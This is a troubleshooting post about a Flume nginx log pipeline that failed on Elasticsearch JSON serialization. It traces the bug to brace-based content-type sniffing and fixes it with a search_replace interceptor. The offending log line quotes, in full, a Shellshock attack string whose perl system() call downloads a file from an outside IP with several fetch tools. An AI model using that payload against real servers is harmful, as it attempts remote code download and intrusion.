Flume nginx log processing exception: JsonParseException: Unexpected character ('(' (code 40)): expected a valid value
Recently the Flume pipeline that processes our nginx logs has been dying every few days with a JSON deserialization exception.
The stack trace:
2016/01/26 14:37:49.043 [ERROR] [] [] [SinkRunner-PollingRunner-DefaultSinkProcessor] [org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:160)] Unable to deliver event. Exception follows.
org.apache.flume.EventDeliveryException: Failed to commit transaction. Transaction rolled back.
at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:227)
at org.apache.flume.sink.DefaultSinkProcessor.process(DefaultSinkProcessor.java:68)
at org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:147)
at java.lang.Thread.run(Thread.java:745)
Caused by: org.elasticsearch.common.jackson.core.JsonParseException: Unexpected character ('(' (code 40)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')
at [Source: [B@78f004c9; line: 1, column: 2]
at org.elasticsearch.common.jackson.core.JsonParser._constructError(JsonParser.java:1487)
at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:518)
at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportUnexpectedChar(ParserMinimalBase.java:447)
at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._handleUnexpectedValue(UTF8StreamJsonParser.java:2485)
at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._nextTokenNotInObject(UTF8StreamJsonParser.java:801)
at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser.nextToken(UTF8StreamJsonParser.java:697)
at org.elasticsearch.common.xcontent.json.JsonXContentParser.nextToken(JsonXContentParser.java:51)
at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.addComplexField(ContentBuilderUtil.java:60)
at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.appendField(ContentBuilderUtil.java:47)
at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.appendHeaders(ElasticSearchLogStashEventSerializer.java:131)
at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:80)
at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:73)
at org.apache.flume.sink.elasticsearch.client.ElasticSearchTransportClient.addEvent(ElasticSearchTransportClient.java:164)
at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:189)
Looking at the relevant code in ElasticSearchLogStashEventSerializer.appendHeaders:
builder.startObject("@fields");
for (String key : headers.keySet()) {
    byte[] val = headers.get(key).getBytes(charset);
    ContentBuilderUtil.appendField(builder, key, val);
}
So the failure happens during serialization. In ContentBuilderUtil:
public static void appendField(XContentBuilder builder, String field,
        byte[] data) throws IOException {
    XContentType contentType = XContentFactory.xContentType(data);
    if (contentType == null) {
        addSimpleField(builder, field, data);
    } else {
        addComplexField(builder, field, contentType, data);
    }
}
`XContentFactory.xContentType(data)` sniffs the content type from the raw bytes. Judging from the stack trace above, the data was detected as JSON here. Looking at how JSON is detected inside that method, there is this piece of code:
// a last chance for JSON
for (int i = 0; i < length; i++) {
    if (bytes.get(i) == '{') {
        return XContentType.JSON;
    }
}
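The loop above means any byte sequence containing a `{` in the sniffed prefix gets classified as JSON, regardless of what the rest of the data looks like. A minimal, self-contained sketch of that heuristic (the 20-byte scan window is my assumption about this Elasticsearch version, and the class/method names are mine):

```java
import java.nio.charset.StandardCharsets;

public class ContentTypeSniff {
    // Mimics the "last chance for JSON" loop shown above (simplified):
    // any '{' anywhere in the scanned prefix makes the payload "look like" JSON.
    static boolean looksLikeJson(byte[] bytes) {
        // Assumption: the real code only scans a short header window (~20 bytes).
        int length = Math.min(bytes.length, 20);
        for (int i = 0; i < length; i++) {
            if (bytes[i] == '{') {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        // A Shellshock-style user agent prefix like the one in the log line below:
        String ua = "() { :;};/usr/bin/perl -e '...'";
        System.out.println(looksLikeJson(ua.getBytes(StandardCharsets.UTF_8))); // true
    }
}
```

Because the `{` sits at byte 3, well inside the scan window, the whole user agent is routed to the JSON parsing path, which then fails on the leading `(`.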
No wonder it breaks: a single `{` is enough to classify the whole value as JSON. Next, let's find the log line that triggered the exception:
54.204.47.156 - - [2016-01-19T12:50:57+08:00] "GET /index.cgi HTTP/1.1" 301 184 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \x22);'" "-" "5.000" "-" "-"
So the user agent string contains a `{` (the `() { :;};` prefix is a Shellshock-style probe), and that single byte fools the JSON sniffing. The fix: add a search_replace interceptor to escape the character before it reaches the serializer:
agent.sources.www.type = exec
agent.sources.www.command = tail -F -n 0 /data/nginx/logs/www.longdai.com.log
agent.sources.www.restart = true
agent.sources.www.logStdErr = true
agent.sources.www.batchSize = 200
agent.sources.www.channels = fch
agent.sources.www.interceptors = cdn sr www i1 i2 i3
agent.sources.www.interceptors.www.type = static
agent.sources.www.interceptors.www.key = app
agent.sources.www.interceptors.www.value = www
agent.sources.www.interceptors.cdn.type = regex_filter
agent.sources.www.interceptors.cdn.regex = .*\\s+\\"ChinaCache\\"\\s+.*
agent.sources.www.interceptors.cdn.excludeEvents = true
agent.sources.www.interceptors.sr.type = search_replace
agent.sources.www.interceptors.sr.searchPattern = \\{
agent.sources.www.interceptors.sr.replaceString = %7b
agent.sources.www.interceptors.sr.charset = UTF-8
agent.sources.www.interceptors.i1.type = regex_extractor
agent.sources.www.interceptors.i1.regex = ([^\\s]*)\\s-\\s([^\\s]*)\\s\\[(.*)\\]\\s+\\"([\\S]*)\\s+([\\S]*)\\s+[\\S]*\\"\\s+(\\d+)\\s+(\\d+)\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"
agent.sources.www.interceptors.i1.serializers = s1 s2 s3 s4 s5 s6 s7 s8 s9 s10 s11 s12 s13
agent.sources.www.interceptors.i1.serializers.s1.name = remote_addr
agent.sources.www.interceptors.i1.serializers.s2.name = remote_user
agent.sources.www.interceptors.i1.serializers.s3.name = datetime
#agent.sources.www.interceptors.i1.serializers.s3.type = org.apache.flume.interceptor.RegexExtractorInterceptorMillisSerializer
#agent.sources.www.interceptors.i1.serializers.s3.name = timestamp
#agent.sources.www.interceptors.i1.serializers.s3.pattern = yyyy-MM-dd'T'HH:mm:ssZ
agent.sources.www.interceptors.i1.serializers.s4.name = http_method
agent.sources.www.interceptors.i1.serializers.s5.name = uri
agent.sources.www.interceptors.i1.serializers.s6.name = status
agent.sources.www.interceptors.i1.serializers.s7.name = body_length
agent.sources.www.interceptors.i1.serializers.s8.name = http_referer
agent.sources.www.interceptors.i1.serializers.s9.name = user_agent
agent.sources.www.interceptors.i1.serializers.s10.name = http_x_forwarded_for
agent.sources.www.interceptors.i1.serializers.s11.name = request_time
agent.sources.www.interceptors.i1.serializers.s12.name = upstream_addr
agent.sources.www.interceptors.i1.serializers.s13.name = upstream_response_time
agent.sources.www.interceptors.i2.type = timestamp
agent.sources.www.interceptors.i3.type = host
agent.sources.www.interceptors.i3.hostHeader = hostname
agent.sinks.elasticSearch.type = org.apache.flume.sink.elasticsearch.ElasticSearchSink
agent.sinks.elasticSearch.channel = fch
agent.sinks.elasticSearch.batchSize = 2000
agent.sinks.elasticSearch.hostNames = 172.16.0.18:9300
agent.sinks.elasticSearch.indexName = nginx
agent.sinks.elasticSearch.indexType = nginx
agent.sinks.elasticSearch.clusterName = longdai
agent.sinks.elasticSearch.client = transport
agent.sinks.elasticSearch.serializer = org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer
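The effect of the `sr` interceptor can be reproduced outside Flume. This sketch (plain JDK; class and method names are mine) applies the same `searchPattern`/`replaceString` pair and shows that the sanitized string no longer contains the byte that fools the content-type sniff:

```java
import java.util.regex.Pattern;

public class SearchReplaceDemo {
    // Same pattern/replacement as the sr interceptor above:
    // searchPattern = \{   replaceString = %7b
    static final Pattern BRACE = Pattern.compile("\\{");

    static String sanitize(String eventBody) {
        return BRACE.matcher(eventBody).replaceAll("%7b");
    }

    public static void main(String[] args) {
        String ua = "() { :;};/usr/bin/perl -e 'print ...'";
        String clean = sanitize(ua);
        System.out.println(clean);               // () %7b :;};/usr/bin/perl -e 'print ...'
        System.out.println(clean.contains("{")); // false
    }
}
```

Replacing `{` with its percent-encoding `%7b` keeps the user agent readable while guaranteeing the JSON sniff can never fire on it.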
The full Flume configuration for processing nginx logs can be found here.